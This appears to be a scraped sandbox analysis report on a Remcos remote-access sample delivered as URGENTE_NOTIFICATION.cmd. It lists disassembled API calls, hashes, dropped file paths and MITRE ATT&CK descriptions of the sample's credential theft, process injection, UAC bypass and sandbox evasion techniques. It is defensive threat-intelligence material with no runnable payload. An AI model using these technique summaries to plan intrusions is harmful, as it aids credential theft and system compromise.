Download Yara Rule

APIs

Part of subcall function 00007FF683F83C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F83D0C
Part of subcall function 00007FF683F83C24: towupper.MSVCRT ref: 00007FF683F83D2F
Part of subcall function 00007FF683F83C24: iswalpha.MSVCRT ref: 00007FF683F83D4F
Part of subcall function 00007FF683F83C24: towupper.MSVCRT ref: 00007FF683F83D75
Part of subcall function 00007FF683F83C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F83DBF

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925,?,?,?,?,00007FF683F7B9B1), ref: 00007FF683F76ABF
RtlFreeHeap.NTDLL(?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925,?,?,?,?,00007FF683F7B9B1), ref: 00007FF683F76AD3

Part of subcall function 00007FF683F76B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF683F76AE8,?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925), ref: 00007FF683F76B8B
Part of subcall function 00007FF683F76B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF683F76AE8,?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925), ref: 00007FF683F76B97
Part of subcall function 00007FF683F76B84: RtlFreeHeap.NTDLL(?,?,?,?,00007FF683F76AE8,?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925), ref: 00007FF683F76BAF

Part of subcall function 00007FF683F76B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F76AF1,?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925), ref: 00007FF683F76B39
Part of subcall function 00007FF683F76B30: RtlFreeHeap.NTDLL(?,?,?,00007FF683F76AF1,?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925), ref: 00007FF683F76B4D
Part of subcall function 00007FF683F76B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F76AF1,?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925), ref: 00007FF683F76B59

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925,?,?,?,?,00007FF683F7B9B1), ref: 00007FF683F76B03
RtlFreeHeap.NTDLL(?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925,?,?,?,?,00007FF683F7B9B1), ref: 00007FF683F76B17

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
String ID:
API String ID: 3512109576-0
Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
Instruction ID: 150e4b7bf54989fe0f7f39134c107e837492d425654f86a7c2e60bbdfd50257a
Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
Instruction Fuzzy Hash: A5216261A09A82C5EF04DF65D4163B87BA0FF5AB49F1C803AC90EA7351DF3C9445C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F759E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F81EA0: wcschr.MSVCRT ref: 00007FF683F81EB3

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F75A2E
_open_osfhandle.MSVCRT ref: 00007FF683F75A4F
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF683F7260D), ref: 00007FF683F937AA
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683F937D2

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
String ID:
API String ID: 22757656-0
Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
Instruction ID: 52949baa21e72813bc9b5d691b0c8b3a611165a0dec6eded43364b23e4a47cee
Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
Instruction Fuzzy Hash: 12113071A18645CBEB504B24E4493797AA1FF89B64F684738DA2E973D0CF3CD549CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F89158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00007FF683F89163
RtlLookupFunctionEntry.NTDLL ref: 00007FF683F89182
RtlVirtualUnwind.NTDLL ref: 00007FF683F891CF
__raise_securityfailure.LIBCMT ref: 00007FF683F89245

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
Instruction ID: f94f72dfe079cb4d33676ddefbb22d0fbc8aea269706a9e64b82001d9f234cae
Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
Instruction Fuzzy Hash: 3721B535919B45C6E7408B05F8923A973B4FF89758F58003AEA8DA37A4DFBDE444C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F95690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF683F95433,?,?,?,00007FF683F969B8,?,?,?,?,?,00007FF683F88C39), ref: 00007FF683F956C5
RtlFreeHeap.NTDLL(?,?,00000028,00007FF683F95433,?,?,?,00007FF683F969B8,?,?,?,?,?,00007FF683F88C39), ref: 00007FF683F956D9
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF683F95433,?,?,?,00007FF683F969B8,?,?,?,?,?,00007FF683F88C39), ref: 00007FF683F956FD
RtlFreeHeap.NTDLL(?,?,00000028,00007FF683F95433,?,?,?,00007FF683F969B8,?,?,?,?,?,00007FF683F88C39), ref: 00007FF683F95711

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
Instruction ID: b82fda4a6fccfc8e2302b43a91854d898fb0218d7aba34019dbcf656d644972e
Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
Instruction Fuzzy Hash: 47110A72A08B91C6DB008F56E4440ADBBB0FB4DF85B5D8129DB4E53718DF38E456CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9F22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F9F235
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F9F249
_get_osfhandle.MSVCRT ref: 00007FF683F9F263
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F9F276

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ConsoleMode_get_osfhandle
String ID:
API String ID: 1606018815-0
Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
Instruction ID: cb21037bc3e0df6f29ad6bc4715e3975f9f7ebefd464fe108dfca1ee1ea4b9eb
Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
Instruction Fuzzy Hash: 3DF03731624A42CBD7045B10E845179FAA0FF8AB06F489239DA0F53394DF3CD404CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F87280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00007FF683F872D2
swscanf.MSVCRT ref: 00007FF683F8731F

Strings

:EOF, xrefs: 00007FF683F872E8

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsnicmpswscanf
String ID: :EOF
API String ID: 1534968528-551370653
Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
Instruction ID: cbc623abc47c83ffa41699422e94c2d88d9a54964fe7477987ae0b19aa040152
Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
Instruction Fuzzy Hash: 1F317031E58642C6FB58AB16A8422B872A0FF55B54F4C4139EA4DF7291DF2CE845C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7B62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

3, xrefs: 00007FF683F7B64D
3, xrefs: 00007FF683F7B685

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID:
String ID: 3$3
API String ID: 0-2538865259
Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
Instruction ID: 71e4be663c894caa773bebcb6b2ee3b3cd62f2d0301c8a03f4e68b7ff7368cab
Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
Instruction Fuzzy Hash: 560153B5D0E182CAF7698B60A8862747270BF45311F9C413EC50EBB5A1DF2C6885C6C0

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report URGENTE_NOTIFICATION.cmd

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\remi\logs.dat

C:\Users\Public\Libraries\KDECO.bat

C:\Users\Public\Libraries\Mywiztwu

C:\Users\Public\Libraries\Mywiztwu.PIF

C:\Users\Public\Libraries\MywiztwuO.bat

Windows Analysis Report
URGENTE_NOTIFICATION.cmd

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

